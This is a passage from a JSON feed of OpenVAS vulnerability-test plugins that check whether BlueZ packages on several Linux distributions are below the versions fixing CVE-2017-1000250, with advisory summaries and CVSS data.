\"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bluez\", rpm:\"bluez~5.44~4.el7_4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-debuginfo\", rpm:\"bluez-debuginfo~5.44~4.el7_4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-libs\", rpm:\"bluez-libs~5.44~4.el7_4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bluez\", rpm:\"bluez~4.66~2.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-debuginfo\", rpm:\"bluez-debuginfo~4.66~2.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-libs\", rpm:\"bluez-libs~4.66~2.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "description": "Check the version of bluez", "modified": "2019-03-08T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310882765", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882765", "type": "openvas", "title": "CentOS Update for bluez CESA-2017:2685 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2017_2685_bluez_centos6.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for bluez CESA-2017:2685 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882765\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 07:16:22 +0200 (Wed, 13 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000250\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for bluez CESA-2017:2685 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of bluez\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The bluez packages contain the following\nutilities for use in Bluetooth applications: hcitool, hciattach, hciconfig,\nbluetoothd, l2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es):\n\n * An information-disclosure flaw was found in the bluetoothd implementation\nof the Service Discovery Protocol (SDP). A specially crafted Bluetooth\ndevice could, without prior pairing or user interaction, retrieve portions\nof the bluetoothd process memory, including potentially sensitive\ninformation such as Bluetooth encryption keys. 
(CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\");\n script_tag(name:\"affected\", value:\"bluez on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:2685\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-September/022531.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bluez\", rpm:\"bluez~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-alsa\", rpm:\"bluez-alsa~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-compat\", rpm:\"bluez-compat~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-cups\", rpm:\"bluez-cups~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-gstreamer\", rpm:\"bluez-gstreamer~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-libs\", rpm:\"bluez-libs~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-libs-devel\", rpm:\"bluez-libs-devel~4.66~2.el6_9\", rls:\"CentOS6\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "description": "The remote host is missing an update for the 'bluez' package(s) announced via the referenced advisory.", "modified": "2019-03-13T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310843301", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843301", "type": "openvas", "title": "Ubuntu Update for bluez USN-3413-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3413_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for bluez USN-3413-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843301\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 07:16:53 +0200 (Wed, 13 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000250\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for bluez USN-3413-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bluez'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that an information\n disclosure vulnerability existed in the Service Discovery Protocol (SDP)\n implementation in BlueZ. A physically proximate unauthenticated attacker could\n use this to disclose sensitive information. 
(CVE-2017-1000250)\");\n script_tag(name:\"affected\", value:\"bluez on Ubuntu 17.04,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3413-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3413-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.04|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bluez\", ver:\"4.101-0ubuntu13.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libbluetooth3:amd64\", ver:\"4.101-0ubuntu13.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libbluetooth3:i386\", ver:\"4.101-0ubuntu13.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bluez\", ver:\"5.43-0ubuntu1.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libbluetooth3:amd64\", ver:\"5.43-0ubuntu1.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libbluetooth3:i386\", ver:\"5.43-0ubuntu1.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n\n if 
(__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bluez\", ver:\"5.37-0ubuntu5.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libbluetooth3:amd64\", ver:\"5.37-0ubuntu5.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libbluetooth3:i386\", ver:\"5.37-0ubuntu5.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-27T18:37:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191378", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191378", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for bluez (EulerOS-SA-2019-1378)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1378\");\n script_version(\"2020-01-23T11:40:56+0000\");\n script_cve_id(\"CVE-2017-1000250\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:40:56 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:40:56 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for bluez (EulerOS-SA-2019-1378)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1378\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1378\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'bluez' package(s) announced via the EulerOS-SA-2019-1378 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An information-disclosure flaw was found in the bluetoothd implementation of the Service Discovery Protocol (SDP). 
A specially crafted Bluetooth device could, without prior pairing or user interaction, retrieve portions of the bluetoothd process memory, including potentially sensitive information such as Bluetooth encryption keys.(CVE-2017-1000250)\");\n\n script_tag(name:\"affected\", value:\"'bluez' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"bluez-libs\", rpm:\"bluez-libs~5.44~4\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-29T20:07:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "description": "The SDP server in BlueZ is vulnerable to an information disclosure\nvulnerability which allows an unauthenticated attacker within Bluetooth\nradio range (no prior pairing or user interaction required) to obtain\nsensitive information from the bluetoothd process memory. 
This vulnerability lies in the processing\nof SDP search attribute requests.", "modified": "2020-01-29T00:00:00", "published": "2018-02-07T00:00:00", "id": "OPENVAS:1361412562310891103", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891103", "type": "openvas", "title": "Debian LTS: Security Advisory for bluez (DLA-1103-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891103\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-1000250\");\n script_name(\"Debian LTS: Security Advisory for bluez (DLA-1103-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-02-07 00:00:00 +0100 (Wed, 07 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00020.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"bluez on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n4.99-2+deb7u1.\n\nWe recommend that you upgrade your bluez packages.\");\n\n script_tag(name:\"summary\", value:\"The SDP server in BlueZ is vulnerable to an information disclosure\nvulnerability which allows remote attackers to obtain sensitive information\nfrom the bluetoothd process memory. 
This vulnerability lies in the processing\nof SDP search attribute requests.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"bluetooth\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"bluez\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"bluez-alsa\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"bluez-audio\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"bluez-compat\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"bluez-cups\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"bluez-dbg\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"bluez-gstreamer\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"bluez-pcmcia-support\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"bluez-utils\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libbluetooth-dev\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libbluetooth3\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libbluetooth3-dbg\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:22", "bulletinFamily": 
"scanner", "cvelist": ["CVE-2017-1000250"], "description": "The remote host is missing an update for the 'bluez' package(s) announced via the referenced advisory (FEDORA-2017-fe95a5b88b).", "modified": "2019-03-15T00:00:00", "published": "2017-09-14T00:00:00", "id": "OPENVAS:1361412562310873368", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873368", "type": "openvas", "title": "Fedora Update for bluez FEDORA-2017-fe95a5b88b", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_fe95a5b88b_bluez_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for bluez FEDORA-2017-fe95a5b88b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873368\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-14 07:41:48 +0200 (Thu, 14 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000250\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for bluez FEDORA-2017-fe95a5b88b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bluez'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bluez on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-fe95a5b88b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AWVMZIXGZ564SXHHRWGEALD7LRSJGI5Q\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"bluez\", rpm:\"bluez~5.46~6.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "description": "Check the version of bluez", "modified": "2019-03-08T00:00:00", "published": "2017-09-14T00:00:00", "id": "OPENVAS:1361412562310882767", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882767", "type": "openvas", "title": "CentOS Update for bluez CESA-2017:2685 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2017_2685_bluez_centos7.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for bluez CESA-2017:2685 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882767\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-14 07:16:10 +0200 (Thu, 14 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000250\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for bluez CESA-2017:2685 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of bluez\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The bluez packages contain the following\nutilities for use in Bluetooth applications: hcitool, hciattach, hciconfig,\nbluetoothd, l2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es):\n\n * An information-disclosure flaw was found in the bluetoothd implementation\nof the Service Discovery Protocol (SDP). A specially crafted Bluetooth\ndevice could, without prior pairing or user interaction, retrieve portions\nof the bluetoothd process memory, including potentially sensitive\ninformation such as Bluetooth encryption keys. 
(CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\");\n script_tag(name:\"affected\", value:\"bluez on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:2685\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-September/022535.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bluez\", rpm:\"bluez~5.44~4.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-cups\", rpm:\"bluez-cups~5.44~4.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-hid2hci\", rpm:\"bluez-hid2hci~5.44~4.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-libs\", rpm:\"bluez-libs~5.44~4.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-libs-devel\", rpm:\"bluez-libs-devel~5.44~4.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 